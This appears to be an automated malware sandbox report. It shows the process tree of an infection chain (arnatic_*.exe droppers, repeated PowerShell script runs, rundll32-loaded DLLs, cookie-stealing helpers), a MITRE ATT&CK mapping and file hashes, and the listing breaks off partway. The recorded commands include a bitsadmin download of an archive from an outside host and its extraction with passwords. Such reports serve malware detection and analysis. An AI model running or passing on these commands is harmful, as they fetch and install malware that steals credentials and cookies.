                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    PID:3744
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Checks for any installed AV software in registry
                                                                                                                                                                                                    PID:5420
                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://marsdevelopmentsftwr.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                    PID:5340
                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pRKEswU8orx4zbTa -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -prbU8Z7MF6tWLHfp -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:2844
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:5588
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:5548
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:6124
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:420
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JVLwqzSkPuc\JVLwqzSkPuc.dll" JVLwqzSkPuc
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:3580
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JVLwqzSkPuc\JVLwqzSkPuc.dll" JVLwqzSkPuc
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                PID:4276
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:3256
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:1116
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:4912
                                                                                                                                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:3156
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                PID:2204
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.exe
                                                                                                                                                                                                                  arnatic_7.exe
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                  PID:2120
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.exe
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2748
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                PID:3252
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_4.exe
                                                                                                                                                                                                                  arnatic_4.exe
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                  PID:3624
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:204
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    PID:4616
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4792
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2152
                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:476
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:2224
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4228
                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5812
                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                PID:5996
                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4496
                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:200
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5132
                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:4488
                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                      PID:296
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1760
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3080
                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5716

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                          2
                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                          4
                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                          7
                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                          7
                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                          Security Software Discovery

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1063

                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                          4
                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_1.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_1.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_2.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_2.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_3.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_3.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_4.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_4.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_5.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_5.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_6.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a0b06be5d5272aa4fcf2261ed257ee06

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            596c955b854f51f462c26b5eb94e1b6161aad83c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            475d0beeadca13ecdfd905c840297e53ad87731dc911b324293ee95b3d8b700b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1eb6b9df145b131d03224e9bb7ed3c6cc87044506d848be14d3e4c70438e575dbbd2a0964b176281b1307469872bd6404873974475cd91eb6f7534d16ceff702

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_6.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a0b06be5d5272aa4fcf2261ed257ee06

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            596c955b854f51f462c26b5eb94e1b6161aad83c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            475d0beeadca13ecdfd905c840297e53ad87731dc911b324293ee95b3d8b700b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1eb6b9df145b131d03224e9bb7ed3c6cc87044506d848be14d3e4c70438e575dbbd2a0964b176281b1307469872bd6404873974475cd91eb6f7534d16ceff702

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\arnatic_7.txt
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\libcurl.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\libcurlpp.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0DC58BD4\libstdc++-6.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                            SHA256

